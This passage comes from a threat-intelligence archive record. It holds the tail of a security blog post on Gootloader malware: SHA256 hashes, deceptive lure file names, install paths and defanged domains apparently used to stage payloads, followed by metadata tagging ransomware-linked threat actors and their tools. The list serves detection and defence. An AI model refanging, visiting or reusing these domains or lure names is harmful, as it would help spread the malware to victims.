Oardwior.ijp\r\nSHA256:\r\nc2b9782c55f75bb1797cb4fbae0290b44d0fcad51bf4f2c11c52ebbe3526d2ac\r\nDomains:\r\nhxxps://spirits-station.fr/\r\nhxxps://www.us.registration.fcaministers.com/\r\nhxxps://motoz.com.au/\r\nhxxps://routinelynomadic.com/\r\nhxxps://www.wagenbaugrabs.ch/\r\nhxxps://studentspoint.org/\r\nhxxps://cortinaspraga.com/\r\nhxxps://dailykhabrain.com.pk/\r\nhxxps://myanimals.com/\r\nhxxps://www2.pelisyseries.net/\r\nGootloader’s initial JavaScript file:\r\nMissouri_Utility_Easement_Guide_2023.js\r\nPath:\r\nC:\\Users\\username\\AppData\\Roaming\\myHUD\r\nSHA256:\r\n7557d5fed880ee1e292aba464ffdc12021f9acbe0ee3a2313519ecd7f94ec5c4\r\nDomains:\r\nhxxps://www.claritycontentservices.com/wp/\r\nhxxps://patriotillumination.com/\r\nhxxps://michaelcheney.com/\r\nhxxps://allreleases.ru/\r\nhxxps://cloudy.pk/\r\nhxxps://eliskavaea.cz/\r\nhxxps://r34porn.net/\r\nhxxps://www.wagenbaugrabs.ch/\r\nhxxps://leadoo.com/\r\nhxxps://ostmarketing.com/\r\nGootloader’s secondary JavaScript file: Certified Trainer.js\r\nPath:\r\nC:\\Users\\username\\AppData\\Roaming\\Canon U.S.A., Inc\r\nSHA256:\r\n5ec9e926d4fb4237cf297d0d920cf0e9a5409f0226ee555bd8c89b97a659f4b0\r\nDomains:\r\nhxxps://egyptelite.com/\r\nhxxps://restaurantchezhenri.ca/\r\nhxxps://www1.zonewebmaster.eu/news/\r\nhxxps://campfosterymca.com/\r\nhxxps://idmpakistan.pk/\r\nhxxps://themasterscraft.com/\r\nhxxps://unica.md/\r\nhxxps://cargoboard.de/\r\nhxxps://www.supremesovietoflove.com/wp/\r\nhxxps://buildacampervan.com/\r\nGootloader’s secondary JavaScript file:\r\nEnvironmental 
Economics.js\r\nSHA256:\r\n87cbe9a5e9da0dba04dbd8046b90dbd8ee531e99fd6b351eae1ae5df5aa67439\r\nDomains:\r\nhxxps://www.minklinkaps.com/\r\nhxxps://aradax.ir/\r\nhxxps://medicit-y.ch/\r\nhxxps://redronic.com/\r\nhxxps://www.ferienhausdehaanmieten.de/\r\nhxxps://gravityforms.ir/\r\nhxxps://apprater.net/\r\nhxxps://fotbalovavidea.cz/\r\nhxxps://usma.ru/\r\nhxxps://thetripschool.com/\r\nGootloader’s initial JavaScript file:\r\nHOA_Committee_Meeting_Agenda_Template.js\r\nAcknowledgments \r\nHuge thanks to @DFIRReport for their generous support, analysis, and contribution to this blog.\r\nSource: https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.huntress.com/blog/gootloader-threat-detection-woff2-obfuscation"
	],
	"report_names": [
		"gootloader-threat-detection-woff2-obfuscation"
	],
	"threat_actors": [
		{
			"id": "faa4a29b-254a-45bd-b412-9a1cbddbd5e3",
			"created_at": "2022-10-25T16:07:23.80111Z",
			"updated_at": "2026-04-10T02:00:04.753677Z",
			"deleted_at": null,
			"main_name": "LookBack",
			"aliases": [
				"FlowingFrog",
				"LookBack",
				"LookingFrog",
				"TA410",
				"Witchetty"
			],
			"source_name": "ETDA:LookBack",
			"tools": [
				"FlowCloud",
				"GUP Proxy Tool",
				"SodomMain",
				"SodomMain RAT",
				"SodomNormal"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a6814184-2133-4520-b7b3-63e6b7be2f64",
			"created_at": "2025-08-07T02:03:25.019385Z",
			"updated_at": "2026-04-10T02:00:03.859468Z",
			"deleted_at": null,
			"main_name": "GOLD VICTOR",
			"aliases": [
				"DEV-0832 ",
				"STAC5279 ",
				"Vanilla Tempest ",
				"Vice Society",
				"Vice Spider "
			],
			"source_name": "Secureworks:GOLD VICTOR",
			"tools": [
				"Advanced IP Scanner",
				"Advanced Port Scanner",
				"HelloKitty ransomware",
				"INC ransomware",
				"MEGAsync",
				"Neshta",
				"PAExec",
				"PolyVice ransomware",
				"PortStarter",
				"PsExec",
				"QuantumLocker ransomware",
				"Rhysida ransomware",
				"Supper",
				"SystemBC",
				"Zeppelin ransomware"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "2a8f551d-206b-48f0-8a03-ed34b29ca8b6",
			"created_at": "2024-10-04T02:00:04.748248Z",
			"updated_at": "2026-04-10T02:00:03.711864Z",
			"deleted_at": null,
			"main_name": "Storm-0494",
			"aliases": [],
			"source_name": "MISPGALAXY:Storm-0494",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "84aa9dbe-e992-4dce-9d80-af3b2de058c0",
			"created_at": "2024-02-02T02:00:04.041676Z",
			"updated_at": "2026-04-10T02:00:03.537352Z",
			"deleted_at": null,
			"main_name": "Vanilla Tempest",
			"aliases": [
				"DEV-0832",
				"Vice Society"
			],
			"source_name": "MISPGALAXY:Vanilla Tempest",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434936,
	"ts_updated_at": 1775792058,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6d02007f968ea3c1ab3da669fb501bb7645f835a.pdf",
		"text": "https://archive.orkl.eu/6d02007f968ea3c1ab3da669fb501bb7645f835a.txt",
		"img": "https://archive.orkl.eu/6d02007f968ea3c1ab3da669fb501bb7645f835a.jpg"
	}
}